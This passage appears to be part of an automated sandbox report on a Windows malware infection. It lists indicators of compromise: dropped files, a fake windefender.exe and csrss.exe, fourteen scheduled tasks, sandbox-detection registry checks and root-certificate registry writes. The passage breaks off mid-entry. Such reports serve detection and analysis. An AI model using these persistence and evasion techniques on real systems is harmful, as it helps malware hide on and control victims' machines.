rCuMQIT.exedescription ioc process File created C:\Program Files (x86)\zgoZGMcaU\SQAzacP.xml rCuMQIT.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\mjzzeAn.xml rCuMQIT.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\LjfrbwI.dll rCuMQIT.exe File created C:\Program Files (x86)\zgoZGMcaU\ymnSQF.dll rCuMQIT.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi rCuMQIT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja rCuMQIT.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\NLUfrGc.xml rCuMQIT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi rCuMQIT.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak rCuMQIT.exe File created C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\TzgjMgm.xml rCuMQIT.exe File created C:\Program Files (x86)\ecOJmsgAHWlsC\lyEOPOd.dll rCuMQIT.exe File created C:\Program Files (x86)\qIYKRzUEasUn\WxPscuh.dll rCuMQIT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak rCuMQIT.exe File created C:\Program Files (x86)\epoBtGYzqLvU2\aymmrnDStQRFN.dll rCuMQIT.exe -
Drops file in Windows directory 14 IoCs
Processes:
6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exeschtasks.exeschtasks.exejhzxw4bTw0XNuv9c289x9RgQ.exeschtasks.exeamert.exeRQgOZ9oytPXnDazWFumrc84r.execsrss.exemsiexec.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\explorta.job 6ca8365acc68dc4b145956b163c463d14768143b069bd009a6aa209a08f8adab.exe File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job schtasks.exe File created C:\Windows\rss\csrss.exe jhzxw4bTw0XNuv9c289x9RgQ.exe File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job schtasks.exe File created C:\Windows\Tasks\chrosha.job amert.exe File opened for modification C:\Windows\rss RQgOZ9oytPXnDazWFumrc84r.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Installer\e5976dc.msi msiexec.exe File opened for modification C:\Windows\Installer\e5976dc.msi msiexec.exe File opened for modification C:\Windows\rss jhzxw4bTw0XNuv9c289x9RgQ.exe File created C:\Windows\rss\csrss.exe RQgOZ9oytPXnDazWFumrc84r.exe File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 3480 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4680 2044 WerFault.exe swiiiii.exe 4680 4064 WerFault.exe alexxxxxxxx.exe 5256 684 WerFault.exe gold.exe 2428 5604 WerFault.exe QgtzpEAOWB6zbl9VfLb2HqcM.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u4bo.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u4bo.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u4bo.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u4bo.3.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 640 schtasks.exe 3004 schtasks.exe 2904 schtasks.exe 5548 schtasks.exe 3856 schtasks.exe 4460 schtasks.exe 1584 schtasks.exe 3212 schtasks.exe 5152 schtasks.exe 5232 schtasks.exe 3108 schtasks.exe 5776 schtasks.exe 5180 schtasks.exe 3848 schtasks.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
rundll32.exechrome.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewindefender.exeRQgOZ9oytPXnDazWFumrc84r.exepowershell.exejhzxw4bTw0XNuv9c289x9RgQ.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exerundll32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" RQgOZ9oytPXnDazWFumrc84r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" RQgOZ9oytPXnDazWFumrc84r.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" RQgOZ9oytPXnDazWFumrc84r.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" RQgOZ9oytPXnDazWFumrc84r.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" RQgOZ9oytPXnDazWFumrc84r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" RQgOZ9oytPXnDazWFumrc84r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" RQgOZ9oytPXnDazWFumrc84r.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" RQgOZ9oytPXnDazWFumrc84r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" jhzxw4bTw0XNuv9c289x9RgQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" RQgOZ9oytPXnDazWFumrc84r.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" jhzxw4bTw0XNuv9c289x9RgQ.exe -
Modifies registry class 1 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1162180587-977231257-2194346871-1000\{D7B4BC0F-6C78-4A39-B591-AAB035BAF93B} chrome.exe -
Processes:
j7efxmeQRKfsUQJlnU7k63nh.exekeks.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e j7efxmeQRKfsUQJlnU7k63nh.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e j7efxmeQRKfsUQJlnU7k63nh.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e j7efxmeQRKfsUQJlnU7k63nh.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 